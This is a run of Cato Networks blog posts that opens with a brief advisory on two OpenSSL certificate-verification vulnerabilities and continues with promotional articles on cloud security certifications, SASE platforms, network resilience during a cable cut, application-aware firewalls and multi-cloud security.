With CVE-2022-3602, a buffer overrun can be triggered in X.509 certificate verification, enabling an attacker to craft a malicious email address to overflow four attacker-controlled bytes on the stack, which could result in a crash, causing a Denial of Service (DoS), or remote code execution (RCE). With CVE-2022-3786, a buffer overrun can also be triggered in X.509 certificate verification, but specifically in name constraint checking. Again, the attacker can craft a malicious email address in a certificate to overflow an arbitrary number of bytes containing the “.” Character (decimal 46) on the stack, resulting in a crash causing a DoS. (Read the OpenSSL Security Advisory here for detailed information about the attacks.)
What’s the Impact on Cato SASE Cloud? None.
While Cato does use OpenSSL neither vulnerability impacts our infrastructure. Neither our cloud assets, the Cato Socket or the Cato Client use a vulnerable version of OpenSSL.
What Actions is Cato Taking?
Cato Networks Research Labs is investigating the unlikely case of exploitation attempts and considering adding new IPS signatures to block them. Currently, we have not seen incidents or published reports of exploitation attempts in the wild.
What Actions Should I Expect from Other Tech Vendors?
The attack is severe enough that all vendors should upgrade affected appliances and software. You can see a list of affected software here. While patching and protecting users at Cato can happen instantly, such as with Log4j, that’s not the case with all solutions. Expect exploits of the OpenSSL vulnerabilities to linger as we saw with Log4j.
Cato Networks Research Labs will continue to monitor the situation and update accordingly.
Although managing on-premises servers may be costly and time-consuming, businesses at least have some control when it comes to patching say, a newly discovered exploit...
How To Identify a Trusted Cloud Provider: The Essential Security Certifications and Practices You Should Look For Although managing on-premises servers may be costly and time-consuming, businesses at least have some control when it comes to patching say, a newly discovered exploit or stopping a zero-day attack. Not so with the cloud. Cloud-based estates are at the mercy of cloud service providers to apply relevant patches and maintain the security of the infrastructure that they’re using.
That’s why it’s so important for organizations to ensure they’re partnering with trusted cloud providers, who can be relied upon to maintain an appropriate level of safeguarding and discipline when it comes to their security. And one of the most important ways they can establish the trustworthiness of a vendor is by seeking out those who have obtained relevant certifications.
SOC 1 and 2: Ever Popular and Important
There are several key accreditations that IT vendors and service providers can attain in order to demonstrate their competency in various areas, such as data privacy or information security.
One of the most frequently requested certifications by customers when delivering due diligence are SOC 1 and SOC 2 Type 2 standards established by the American Institute of CPAs (AICPA).
SOC 1 helps organizations examine and report on their internal controls relevant to their customer's financial statements. At the same time, SOC 2 focuses on controls relevant to the security, availability, processing, integrity, confidentiality, and privacy of customer's data. Cato is annually audited by a 3d party to ensure procedures and practices are followed and never neglected.
[boxlink link="https://www.catonetworks.com/resources/casb-demo/?utm_medium=blog_top_cta&utm_campaign=cato_demo_controlling_cloud"] Controlling Cloud Usage IT with Cato CASB | Cato Demo [/boxlink]
The ISO Family Is Well Known for Good Reason
The ISO27000 family of certifications is among the most popular and well-known. These certifications are independently verified and internationally recognised and are often regularly updated to reflect current best practices. When comparing cloud providers, IT leaders should look for those that adhere to a variety of well-known industry standards relevant to their business globally. Another recommendation is to focus not only on general security certifications, but also on cloud security and privacy protection as they become a prerequisite for doing business.
Cato Networks, for example, holds many certifications within this family, such as ISO27001, which sets out the specification for an information security management system (ISMS). This includes policies, goals and objectives, statement of applicability (SOA), roles and responsibilities (R&R), risk assessment, and treatment methods. This is one of the most well-known and requested certifications internationally, creating a “security first” approach in the organizational culture.
Achieving ISO27001 certification is often the first step on a vendor’s journey and is a prerequisite for earning further related accreditations. ISO27017 – also held by Cato – is one of the security standard’s extensions for cloud service providers, and addresses access control, cryptography, physical and environmental security, information lifecycle management, and other controls in the cloud. ISO27017 can help win new business as many organizations now worry about cloud security and want to ensure their assets are protected wherever they are stored or processed.
ISO27701 and ISO27018, meanwhile, are data privacy extensions that demonstrate that Cato has met the guidelines for implementing measures to protect Personally Identifiable Information (PII). ISO27701 focuses on establishing, implementing, and maintaining privacy information management system (PIMS), managing privacy risks related to PII, and helps to comply with GDPR and other data protection regulations. ISO27018 focuses on PII protection in the cloud and offers guidance on implementing privacy by design.
In order to achieve ISO27701 and ISO27018 extensions, organizations like Cato must follow the most comprehensive data controls delivered by an internationally recognized standard, which makes it easier for Cato and its solutions to provide assurances about their security and data protection practices. Cloud vendors should be constantly updating and adding to the library of certifications that they’ve achieved in order to demonstrate a deepening of their skills, and a continued commitment to their customers’ safety.
These certifications – as well as the many others held by reputable cloud providers such as Cato – are useful in proving a firm commitment to high standards of security and privacy. They can also play a valuable role in ensuring compliance with key regulatory frameworks, including the European GDPR, and the California Consumer Privacy Act – which is vital for supporting clients who are bound by these laws.
What to Consider Beyond Certifications
Certifications only tell part of the security story, however. In addition to accreditations, the actions of a company – as well as its attitudes and approaches to compliance - can also indicate whether a provider is serious about security. Along with recognizing the need for certification, and the important role that compliance plays in the business, organizations must continually evolve in their implementation, maintenance, and monitoring of compliance issues. This is why Cato is constantly investing in new capabilities, tools, and approaches which are needed to demonstrate accurate, deep, and real-time compliance with the security and privacy standards it adheres to.
For instance, while more traditional development life cycles places security and compliance testing as one of the final stages a solution would go through prior to deployment, Cato follows the ‘Shift Left’ approach. This concept, first popularised within the DevOps community, involves injecting processes such as testing and security into an earlier phase of project development, in order to identify potential problems more quickly and easily.
Another tactic borrowed from the world of DevOps is the adoption of data-driven decision-making. Instead of relying on data reflecting a specific point in time to conduct compliance audits, real-time data from live systems now allows for continuous monitoring and comparison with security standard. This provides a much more in-depth picture of compliance posture, as opposed to the high-level gaps revealed by more static methodologies.
In-depth, accurate data is also used much more heavily in risk models, which are now created using quantitative rather than qualitative analysis. This gives much better visibility of genuine risk factors and their potential impact, without relying on subjective perceptions. This reflects the broader change in attitudes towards compliance across the industry; where previously compliance tasks would have been handled by technical personnel and consultants, organizations will now often have entire teams dedicated to compliance, including representatives from GRC departments and the DPO’s office, which maintain ownership of related issues on a continuous basis.
Certifications are Essential for Building a Trusted Relationship
The relationship between a cloud service provider and their customer depends on trust. Ensuring that the right certifications are in place to demonstrate an ability to support the full range of client needs is an essential part of building and maintaining that trust. A robust certification and compliance posture is more than ever an essential part of security - and it can also create opportunities and win business worldwide if well managed and updated.
As businesses grow, they should take pains to ensure that their cloud provider – and the maturity of their certifications – is growing along with them. The commitment and expertise that these accreditations signify are invaluable for organizations as they scale and bespeak a partner that’s willing to go the distance. Remember: security is a marathon, not a sprint.
The cybersecurity industry is well known for its buzzwords. Every year, a new word, phrase, or acronym emerges to describe the latest and greatest tool...
If You Want a True Security Platform, You Need SASE The cybersecurity industry is well known for its buzzwords. Every year, a new word, phrase, or acronym emerges to describe the latest and greatest tool that is absolutely essential to an organization’s ability to protect itself against cyber threats. Recently, the focus has been on ‘security platforms’, which are intended to simplify security architectures by consolidating many security capabilities within a single solution. This approach can provide many benefits, but many of these so-called ‘security platforms’ lack the ability to meet the security needs of the modern business.
The Goal: Combining Many Security Functions Within a Single Solution
Companies face a variety of cyber threats, a problem that is exacerbated by the evolution of corporate IT infrastructures and the cyber threat landscape. With the rise of cloud computing, remote work, and Internet of Things (IoT) and mobile devices, cyber threat actors have many potential targets for their attacks.
Historically, companies addressed these new cyber risks by selecting security solutions that were targeted at solving a certain problem or closing a particular security gap. For example, an organization may augment firewall security solutions with the threat prevention capabilities of an intrusion prevention system.
However, this approach often results in complex, unusable security architectures. With many standalone security solutions, corporate security teams are overloaded with security alerts, waste time configuring and context switching between solutions, and must contend with security tools that have both overlapping functionality and leave visibility and security gaps.
With the cybersecurity skills gap making it difficult to attract and retain essential security talent, many companies are focusing their efforts on simplifying and streamlining their security architectures. Integrated security platforms are the new goal, combining many security functions within a single solution in an attempt to reduce or eliminate the challenges caused by security architectures composed of an array of standalone solutions.
[boxlink link="https://catonetworks.easywebinar.live/registration-enhancing-your-enterprise-network-security-strategy?utm_medium=blog_top_cta&utm_campaign=enhancing_network_security_webinar"] Enhancing Your Enterprise Network Security Strategy | Webinar [/boxlink]
A Security Platform Needs to Meet a Company’s Security Needs
An effective security platform is one that is designed to meet the needs of the modern, growing corporate network. This includes the following capabilities:
Product Consolidation: Product consolidation is the key selling point of a security platform since it allows organizations to eliminate the complexity and overhead of managing many standalone solutions. Security platforms should offer several security functions — such as a next-generation firewall (NGFW), zero-trust network access (ZTNA), intrusion prevention system (IPS), cloud access security broker (CASB), and more — and be managed and monitored via a single pane of glass.
Universal Protection: The corporate WAN is rapidly expanding and includes on-prem, cloud-based, and remote devices. A security platform must be able to secure all of the corporate WAN without negatively impacting network performance, such as the latency caused by backhauling network traffic to an organization’s on-prem security architecture for inspection and policy enforcement. Scalable Protection: Corporate networks are growing rapidly, and the introduction of cloud infrastructure, IoT devices, and other endpoints increases the volume of traffic flowing over the corporate WAN. Security platforms must be able to scale to secure growing traffic volumes without negatively impacting network performance or requiring the deployment of additional solutions. Cloud Support: Cloud adoption is near-universal across organizations, and 80% of companies have deployed multi-cloud infrastructure. Cloud-based and on-prem infrastructure differs significantly, and security platforms should operate effectively and provide strong risk management across an organization’s entire IT architecture. Consistent Policy Enforcement: Consistently enforcing security policies across on-prem and cloud-based infrastructure is complex, especially in multi-cloud environments where different cloud providers offer different sets of security tools and configuration options. A security platform should enable an organization to enforce security policies across all of the environments that compose an organization’s cloud infrastructure.
The goal of replacing standalone security solutions with security platforms is to simplify and streamline security. To accomplish this, security platforms must meet all of an organization’s security needs. Otherwise, companies will need to deploy additional security tools to close gaps, starting the cycle over again.
SASE is the Ultimate Security Platform
Replacing an organization’s complex security infrastructures with an integrated security platform can be a significant challenge. With diverse environments, each with its own unique security needs and limitations, identifying and configuring a solution that is universally effective can be difficult.
Secure Access Service Edge (SASE) is the only security platform with a guaranteed ability to meet all of the security requirements of the modern business. Some of the key capabilities of SASE include:
Cloud-Native Protection: SASE solutions are deployed within cloud points of presence (PoPs). SASE’s cloud-native design ensures that it can scale with the business and can secure corporate devices wherever they are. Converged Security: SASE solutions converge many network and security functions — including ZTNA, IPS, and firewall security functions — into a single solution. This convergence eliminates the complexity caused by standalone solutions and can also enable increased efficiency and optimization. Network-Level Protection: SASE secures the corporate network by sending all traffic through a SASE PoP en route to its destination. This ensures consistent security policy enforcement and management across all of an organization’s IT environments.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about consolidating and streamlining your organization’s security architecture with Cato SASE Cloud by signing up for a free demo today.
Organizations are in the midst of an exciting period of transformational change. Legacy IT architectures and operational models that served enterprises over the past three...
SASE, SSE, ZTNA, SD-WAN: Your Journey, Your Way Organizations are in the midst of an exciting period of transformational change. Legacy IT architectures and operational models that served enterprises over the past three decades are being re-evaluated. IT organizations are now driven by the need for speed, agility, and supporting the business in a fiercely competitive environment.
What kind of transformation is needed to support the modern business? The short answer is “cloudification.” Migration of applications to the cloud had been going on for a decade, offloading complex datacenter operations away from IT, and in that way increasing business resiliency and agility. However, the migration of other pillars of IT infrastructure, such as networking and security, to the cloud is a newer trend.
Transforming Networking and Security for the Modern Enterprise
In 2019, Gartner outlined a new architecture, the Secure Access Service Edge (SASE), as the blueprint for converging a wide range of networking and security functions into a global cloud service. Key components include SD-WAN, Firewall as a Service (FWaaS), Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Data Loss Prevention (DLP), and Zero Trust Network Access (ZTNA). Two years later, Gartner created a related framework focused exclusively on the security pillar of SASE, the Security Service Edge (SSE).
By moving to a converged cloud design, SASE and its major components of SD-WAN and SSE aim to eliminate the pile of point solutions, management consoles, and loose integrations that led to a rigid, costly, and complex infrastructure. This transformation addresses the root causes of IT's inability to move at the speed of business – budgetary constraints, resource limitations, and insufficient technical skills.
The Journey to a Secure Network for the Modern Enterprise
As customers started to look at the transformational power of SASE, many saw a long journey to move from their current set of appliances, services, and point solutions to a converged SASE platform. IT knows too well the challenges of migrating from proprietary applications in private datacenters to public cloud applications and cloud datacenters, a journey that is still on going in many enterprises today.
How should enterprise IT leaders proceed in their journey to transform networking and security? There are two dimensions to consider: the use cases and the IT constraints.
Driving Transformation through Key Use Cases
There are several key use cases to consider as the entry point to the networking and security transformation journey. Taking a platform approach to solving these immediate challenges will make addressing future challenges much easier and more cost-effective as the enterprise proceeds towards a full infrastructure transformation.
Work from Anywhere (ZTNA)
During COVID the need for secure remote access (ZTNA) became a critical IT capability. Enterprises must be ready to provide the entire workforce, not just the road warriors, with optimized and secure access to applications, on-premises and in the cloud. Deploying a ZTNA solution that is part of the SSE pillar of a single-vendor SASE platform overcomes the scalability and security limitations of appliance-based VPN solutions. ZTNA represents a “quick win,” eliminating a legacy point-solution and establishes a broad platform for continued transformation.
Cloud access control and sensitive data protection (CASB/DLP)
The adoption of public cloud applications enables users to get work done faster. However, while the cloud may only be a click away, unsanctioned applications increase business risk through security breaches, compliance violations, and data loss. Deploying the CASB and DLP capabilities in the SSE portion of a SASE platform addresses the need to control access to the cloud and protect sensitive data.
Firewall elimination (FWaaS)
One of the biggest challenges in managing an enterprise security footprint is the need to patch, upgrade, size, and retire discrete appliances. With Firewall as a Service (FWaaS), enterprises relieve themselves of this burden, migrating the WAN security and routing of firewall appliances to the cloud. FWaaS is not included in Gartner’s SSE definition but is a part of some SSE platforms, such as Cato SSE 360.
Migration of MPLS to Secure SD-WAN
The legacy MPLS services connecting locations are unsuitable for supporting cloud adoption and the remote workforce. By migrating locations from MPLS to SD-WAN and Internet connectivity, enterprises install a modern, agile network well suited toward business transformation. Customers may choose to preserve their existing security infrastructure, initially deploying only edge SD-WAN and global connectivity capabilities of a SASE platform, like Cato SASE Cloud. When ready, companies can migrate locations and users to the SSE capabilities of the SASE platform.
Whether the enterprise comes from networking or security, the right platform should enable a gradual journey to full transformation. Deploying SD-WAN that is a part of a single-vendor SASE platform, enables future migration of the security infrastructure into the SSE pillar. Conversely, deploying one of the security use cases of ZTNA, CASB/DLP or FWaaS that are part of a converged SSE platform enables seamless accommodation of other security use cases. And if SSE is a part of a single-vendor SASE platform, migration can be further extended into the network to address migration from MPLS or third-party SD-WAN into a full SASE deployment.
Accelerating Your Journey by Overcoming Enterprise IT Constraints
The duration and structure of your journey is impacted by enterprise constraints. Below are some examples and best practices we learned from our customers on dealing with them.
Retiring existing solutions
The IT technology stack includes existing investments in SD-WAN, security appliances, and security services that have different contractual terms and subscription durations. Some customers want to let current contracts run their course before evaluating a move to converge existing point products into a SASE or SSE platform. Other customers work with vendors to shorten the migration period with buyout programs.
Working across organizational silos
SASE project is cross functional, involving the networking and security teams. Depending on organizational structure, the teams may be empowered to make standalone decisions, complicating a collaborative decision. We have seen strong IT leadership guide teams to evaluate a full transformation as an opportunity to maximize value for the business, while preserving role-based responsibility for their respective domains.
If bringing the teams together isn’t possible in the short term, a phased approach to SASE is appropriate. When SD-WAN or SSE decisions are taken independently the teams should assess providers that can deliver a single-platform SASE even if the requirements are limited to either the networking or the security domains.
The Way Forward: Your Transformation Journey, Done Your Way
As the provider of the world’s first and most mature single-vendor SASE platform, that is powered by Cato SSE 360 and Cato’s Edge SD-WAN, we empower you to choose how to approach your transformation journey. You can start with either network transformation (SD-WAN) or security transformation (SSE 360) and then proceed to complete the transformation by seamlessly expanding the deployment to a full SASE on the very same platform. Obviously, the deeper the convergence the larger the business value and impact it will create.
To learn more about visit the following links: Cato SASE, Cato SSE 360, Cato Edge SD-WAN, and Cato ZTNA.
Last week, once again the industry saw the importance of building your enterprise network on a global private backbone not just the public Internet. On...
Inside a Network Outage: How Cato SASE Cloud Overcame Last Week’s Fiber Optic Cable Cut Last week, once again the industry saw the importance of building your enterprise network on a global private backbone not just the public Internet. On Monday night, a major fiber optic cable was severed in the Bouches-du-Rhône region of France. The cut impacted the Internet worldwide. Instantly, packet loss surged to 100 percent on select carriers connecting to our Marseilles, Dubai, and Hong Kong PoPs.
And, yet, despite this major outage, Cato users were unaffected. No tickets were opened; no complaints filed. Why? Because the Cato SPACE architecture detected the packet loss spike on the carrier’s network and moved user traffic to one of the other tier-1 providers connecting the Cato PoP.
All of this was done automatically and in seconds. Just look at the below report from our Marseilles PoP. Notice how at 02:21 UTC Cato isolated the two affected carriers (aqua and orange lines) and traffic was picked up by the other carriers at the PoP.
Uplink Traffic Report from Cato’s Marseilles PoP
Click here to enlarge the image
It’s not the first time we’ve seen the resiliency of the Cato Global Private backbone. Whether it’s a network failure or a crash at a top-tier datacenter housing a Cato PoP Cato has proven its ability to automatically recover quickly with little or no impact on the user experience.
The network engineering involved in delivering that kind of availability and performance goes to the very DNA of Cato. From the very beginning, we built our company to address both networking and security. Our founders didn’t just help build the first commercial firewall (Shlomo Kramer) they also built one of the global cloud networks (Gur Shatz). The teams they lead and have built the tools and processes to lead in both domains, which is what’s required in this world of SASE.
When building the Cato Global Private Backbone, we wanted to provide enterprises with the optimum network experience regardless of a site’s location, route taken, or network condition. As such, we built many tiers of redundancy into Cato, such as users automatically connecting to the optimum PoP, instant failover between SPACE instances within a server, servers within a PoP, and between PoPs. (Follow the link for a detailed look at the resiliency built into the Cato Global Private Backbone.)
[boxlink link="https://www.catonetworks.com/resources/single-pass-cloud-engine-the-key-to-unlocking-the-true-value-of-sase/?utm_medium=blog_top_cta&utm_campaign=space_wp"] Single Pass Cloud Engine: The Key to Unlocking the True Value of SASE | EBOOK [/boxlink]
Building our backbone from third-party networks, such as those offered by Amazon, Azure or Google, would certainly have been easier, but that would also compromise our control over the underlying network. The network between two PoPs on an Azure or Amazon network in the same region or zone might be reliable enough, but what happens when those PoPs exist across the globe, in different hyperscaler regions/zones, or on separate hyperscaler networks altogether?
As both networking and security professionals, we at Cato didn’t want to leave those and other scenarios to chance. We wanted to own the problem from end-to-end and ensure enterprise customers that they would receive the optimum performance all the time from anywhere to anywhere even during failover conditions.
By building PoPs on our own infrastructure and curating PoP-to-PoP connectivity, we can control the routing, carrier selection, and PoP placement. Carriers connecting our PoPs have been carefully selected for zero packet loss and low latency to other PoPs and for optimal global and regional routes. Cato SPACE architecture monitors those carrier networks, automatically selecting the optimum path for every packet. This way no matter the scenario, users receive the optimum performance.
And by owning the infrastructure, we can deliver PoPs where enterprises require them not where hyperscalers want to place them. With 75+ PoPs all running Cato’s cloud-native SPACE architecture, Cato has more real time deep packet processing capacity than any hyperscaler worldwide. It’s why enterprises with users in 150+ countries trust Cato every day to help them slash telecom costs, boost performance by 20x, and increase availability to five nines by replacing their legacy MPLS networks with the Cato Global Private Backbone.
For many so-called SASE players, one or the other side gets missed. Players coming from the security world need to outsource PoP placement to third-parties who understand networking. Networking vendors coming to SASE need to partner for security expertise. Both approaches compromise the SASE solution. Cato is the only vendor in the world built from the ground up to be single-vendor SASE platform. This is why we can deliver the world’s most robust single-vendor cloud-native SASE platform – today.
Firewalls – the foundation of an organization’s network security strategy – filters network traffic and can enforce an organization’s security rules. By limiting the traffic...
Why Application Awareness is Essential for Firewall Security Firewalls - the foundation of an organization’s network security strategy - filters network traffic and can enforce an organization’s security rules. By limiting the traffic that enters and leaves or enters an organization’s network, a firewall can dramatically reduce its vulnerability to data breaches and other cyberattacks.
However, a firewall is only effective if it can accurately identify network traffic and apply the appropriate security policies and filtering rules. As application traffic is increasingly carried over HTTP(S), traditional, port-based methods of identifying application traffic are not always effective. Application awareness identifies the intended destination of application traffic, providing the visibility that next-generation firewalls (NGFWs) require to apply granular security policies.
What is Application Awareness?
Different network protocols have different functions and present varying security risks. This is why firewalls and other network security solutions are commonly configured with rules that apply to specific ports and protocols, such as restricting external access to certain services or looking for protocol-specific threats.
However, the growth of Software as a Service (SaaS) solutions and other web-based solutions has caused the HTTP(S) protocol to support a wider range of services. As a result, filtering traffic and applying security rules based on port numbers is less effective than before.
Application-aware networking and security solutions can identify the application that is the intended destination of network traffic. Doing so without relying solely on common port numbers requires a deep understanding of the network protocol and commands used by the application. For example, web browsing data and webmail data carried over HTTPS may have similar network packet headers but contain very different types of data.
The ability to differentiate between types of application traffic can provide several benefits beyond security. For example, an organization may implement network routing and quality of service (QoS) rules for traffic based on the target application. Latency-sensitive videoconferencing traffic may be prioritized, while browsing traffic to social media and other non-business sites may have a lower priority if it is permitted at all.
[boxlink link="https://catonetworks.easywebinar.live/registration-101?utm_medium=blog_top_cta&utm_campaign=future_of_security_webinar"] The Future of Network Security: Do All Roads Lead to SASE? | Webinar [/boxlink]
How Application Awareness Enhances Firewall Security
The Internet is increasingly dominated by HTTP(S) traffic as various applications move to web-based models with the growth of SaaS and other cloud-based services. The rise of DNS over HTTPS (DoH) and other protocols that attempt to leverage built-in TLS support within the HTTPS protocol accelerates this trend. However, these various types of traffic carried over the HTTP(S) protocol may present different levels of risk to the organization and be vulnerable to different types of attacks.
A one size fits all approach to securing these diverse applications can negatively impact application performance and security. An organization’s firewall rules may be configured based on the traffic associated with a particular protocol as a whole, so all web traffic may be permitted through, while other protocols may be blocked entirely. Additionally, security solutions may inspect traffic for malicious content that poses no risk to a particular application or overlook application-specific security risks.
Integrating application awareness into security solutions provides them with valuable context that can improve network security as well as network routing. For example, an understanding that a particular type of traffic is associated with Internet of Things (IoT) devices can enable next-generation firewalls (NGFWs) to search for threats common to those devices or block access to the devices from outside of the corporate WAN.
Granular network traffic inspection and security rules are essential to implementing an effective zero-trust security strategy. Application awareness is essential to achieving this granularity, especially as increasing volumes of application traffic are carried over the HTTP(S) protocol.
Taking Full Advantage of Application Awareness with SASE
Application awareness can provide benefits for numerous network tools, including those with both network performance and security functions. For example, on the networking side, application awareness is valuable to software-defined WAN (SD-WAN) solutions because it informs the routing of various traffic types over the corporate WAN and can help determine the priority of different types of traffic. On the security side, firewalls and other security solutions can use application awareness to tune security rules to an application’s unique needs and risk profile.
While application awareness can be implemented in each solution that uses it, this is an inefficient approach. SD-WANs, NGFWs, and other solutions that use application awareness all need to know the intended destination of a particular type of traffic. If each solution independently maintains a library of traffic signatures and applies them to each traffic flow, the result is a highly-redundant system that may negatively impact network latency and performance.
Secure Access Service Edge (SASE) solutions eliminate this redundancy and these performance impacts by converging many of the functions that require application awareness into a single solution. Under this design, SD-WANs, NGFWs, and other solutions that need insight into the destination of application traffic can access this information without computing it independently.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations and is easily managed from a single pane of glass. Learn more about Cato SASE Cloud’s targeted application security capabilities by signing up for a free demo today.
Cloud-based deployments provide many benefits to organizations, such as greater scalability, flexibility, and availability than many organizations can achieve in-house. However, cloud infrastructure also comes...
Designing a Security Strategy for the Multi-Cloud Enterprise Cloud-based deployments provide many benefits to organizations, such as greater scalability, flexibility, and availability than many organizations can achieve in-house. However, cloud infrastructure also comes with its costs, such as the challenges of securing an organization’s on-premises and cloud environments. For organizations making the move to the cloud, redesigning their security strategies to protect multi-cloud deployments can pose a significant challenge.
Most Companies Are Multi-Cloud
Cloud adoption is growing rapidly as companies take advantage of the numerous benefits and advantages available with cloud infrastructure. However, most organizations are not selecting a single cloud provider to augment or replace their existing on-prem data centers. In fact, 89% of businesses have a multi-cloud strategy.
When looking to move to the cloud, many options are available, and different cloud platforms are optimized for particular use cases and have their own advantages and disadvantages. Since companies’ cloud-based infrastructure is designed to fulfill various purposes — data storage and hosting of both internal and public-facing applications — the variety of cloud environments makes it possible for companies to choose environments that are optimized for a particular use case.
Multi-Cloud Environments Create Security Challenges
While multi-cloud deployments provide numerous advantages when compared to on-prem infrastructure, such as scalability, flexibility, availability, and cost savings, they also have their downsides.
Some of the security challenges associated with multi-cloud environments include:
Shared Responsibility Model: In cloud environments, a cloud customer shares responsibility for managing and securing their cloud infrastructure with the cloud provider. The cloud customer must gain and maintain expertise in understanding and securing their part. Disparate Environments: Multi-cloud deployments are composed of cloud infrastructure developed by various providers. The heterogeneity of an organization’s cloud deployment can make it complex to develop firewall security rules and enforce consistent security policies across multi-cloud and on-prem environments. On-Prem and Cloud-Based Infrastructure: Organizations rarely abandon on-prem infrastructure entirely when they move to the cloud. As a result, they must design security architectures that span on-prem and multiple cloud deployments. In some cases, security solutions designed for one environment may be less effective or entirely unable to function in another. Platform-Specific Solutions: Most cloud providers offer security solutions and configuration settings designed to secure deployments on their cloud platform. However, these solutions and settings vary from one provider to another, increasing the complexity of correctly configuring security settings and implementing consistent security across multiple environments.
Perimeterless Security: Historically, many organizations have adopted a perimeter-focused firewall security strategy designed to protect on-prem IT infrastructure. With cloud environments — and especially multi-cloud deployments — the perimeter has dissolved, making it necessary to design and implement a security strategy not focused on securing a perimeter. New Security Threats: A move to the cloud opens up an organization to new security threats not present in on-prem environments. As the number of cloud environments increases, so does the number of potential attack vectors.
Many organizations struggle with cloud security due to the unfamiliarity of cloud infrastructure and the differences between securing on-prem and cloud-based environments. With multi-cloud deployments, these challenges are amplified, and companies must figure out how to secure environments where legacy security models and technologies may not be effective.
[boxlink link="https://www.catonetworks.com/podcasts/private-cloud-public-cloud-where-do-we-stand-with-the-great-migration-of-services/?utm_medium=blog_top_cta&utm_campaign=convergence_podcast_ep2"] Private Cloud + Public Cloud: Where Do We Stand With the Great Migration of Services? | Podcast Episode [/boxlink]
SASE Enables Effective multi-cloud Security
Much of the complexity of multi-cloud security comes from the fact that a multi-cloud deployment consists of many unique cloud environments. What might work to secure one environment may be ineffective or infeasible in another.
Secure Access Service Edge (SASE) solutions diminish the complexity of securing multi-cloud deployments by securing the network instead. All traffic flowing to, from, and between an organization’s cloud-based and on-prem infrastructure travels over the network. By implementing security inspection and policy enforcement at the network level, SASE can consistently apply security across an organization’s entire IT infrastructure.
In addition to simplifying multi-cloud security, SASE also provides numerous other security benefits, which include:
Global Reach: SASE is deployed within cloud-based points of presence (PoP). Globally distributed PoPs ensure that traffic can be inspected at a geographically close PoP and then routed on to its destination without the backhauling required by on-prem security deployments. Security Integration: SASE solutions implement a full network security stack, including an NGFW, IPS, CASB, ZTNA, and more. By converging multiple security functions into a single solution, SASE achieves greater optimization than standalone solutions. Network Optimization: SASE PoPs also integrate network optimization capabilities such as SD-WAN and a global private backbone. PoPs are also connected by dedicated, high-performance network links to optimize network performance and minimize latency.
Scalable Security: As a cloud-native solution, SASE can also take advantage of the scalability benefits of the cloud. This makes it possible for SASE PoPs to scale to secure higher-bandwidth network traffic without negatively impacting network performance.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. Cato optimizes and secures application access for all users and locations and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud can help your organization secure its on-prem and multi-cloud infrastructure by signing up for a free demo today.
Gartner has long been clear about the core capabilities that comprise a SASE solution. And as a Representative Vendor in the 2022 Gartner® Market Guide...
New Gartner Report Identifies Four Missed Tips When Evaluating SASE Platform Capabilities Gartner has long been clear about the core capabilities that comprise a SASE solution. And as a Representative Vendor in the 2022 Gartner® Market Guide for Single-Vendor SASE, Cato meets those capabilities delivering SWG, CASB, ZTNA, SD-WAN, FWaaS, and Malware inspection all at line-rate operation even when decrypting traffic.
While a single platform providing those capabilities is certainly impressive, we at Cato have never thought those features alone make for a single-vendor SASE platform. To radically simplify and improve their security and network operations, IT teams require a fully converged platform. Platforms where capabilities remain discrete and fail to share context and insight forces IT operation to continue juggling multiple consoles that leads to the difficulties IT has long faced when troubleshooting and securing legacy networks.
Gartner would seem to agree. In the 2022 Gartner Market Guide for Single-Vendor SASE (available here for download), Gartner explains how the core capabilities of a well-architected single-vendor SASE offering should be integrated together, unified in management and policy, built on a unified and scalable architecture and designed in a way that makes them flexible and easy to use.
You Say Integrated, We Say Converged
What Gartner describes as integrated we prefer to call converged. But whether it’s converged or integrated we both agree on the same point -- all capabilities must be delivered as from one engine where event data is stored in one common repository and surfaced through a common analytics engine.
[boxlink link="https://www.catonetworks.com/news/cato-has-been-recognized-as-representative-vendor-in-2022-gartner-market-guide-for-single-vendor-sase/?utm_medium=blog_top_cta&utm_campaign=gartner_market_guide_news"] Cato Networks Has Been Recognized as a Representative Vendor in the 2022 Gartner® Market Guide for Single-Vendor SASE | Read now [/boxlink]
Unified Management and Policy: Essential for Visibility and Enforcement
Arguably the biggest operational challenge for legacy networks post-deployment is with data distributed across appliances and, by extension, data repositories. How do operational teams quickly identify and address and diagnose potentially malicious or problematic activity and then enforce consistent security policies across the enterprise? And, as a cloud service, how is that done in a way that gives enterprise customers complete control over their own networks while running on a shared platform?
At Cato, we’ve developed the Cato SASE Cloud so that a single management console gives enterprises control over all Cato capabilities – networking and security. A single policy stack uses common data objects enabling enterprises to set common security policies for users and resources in and out of the office. And the Cato architecture is a fully multitenant, distributed architecture giving users complete control over and visibility into their own networks.
The Cloud Provides Unified and Scalable Architecture
With legacy networks, IT teams must invest considerable time and resources on maintaining their branch infrastructure. Appliances need to be upgraded as new capabilities are enabled or traffic volumes grow. And with each new security feature enabled, there’s a performance hit that further degrades the user experience.
All of which is why Cato built the Cato SASE Cloud platform on a global network of PoPs. Every Cato PoP consists of multiple compute nodes with multiple processing cores, with each core running a copy of the Cato Single Pass Cloud Engine (SPACE), Cato’s converged networking and security software stack. Cato SPACE handles all routing, optimization, acceleration, decryption, and deep packet inspection processing and decisions. SPACE is a single-pass architecture, performing all security inspections in parallel, which allows Cato to maintain wire-speed inspection regardless of traffic volumes and enabled capabilities.
Make it Flexible, Make it Easy
With legacy networks, IT leaders had a tough choice: backhaul traffic to a central inspection point simplifying operations, but add latency and undermine performance, or inspect traffic on-site for better performance but far more complicated operations and deployment.
At Cato, we found a different approach: bring processing as close to the user as possible by building out a global network of PoPs. With the Cato SASE Cloud spanning so many PoPs worldwide, enterprise locations are typically within 25ms RTT of a Cato PoP. In fact, today, Cato serves 1,500 enterprises customers with sites and users in 150+ countries. With PoPs so nearby, enterprises gain the reduced latency experience of local inspection without burdening IT. All with the simplicity of a cloud service.
Single-Vendor SASE: It’s Not Just About the Features
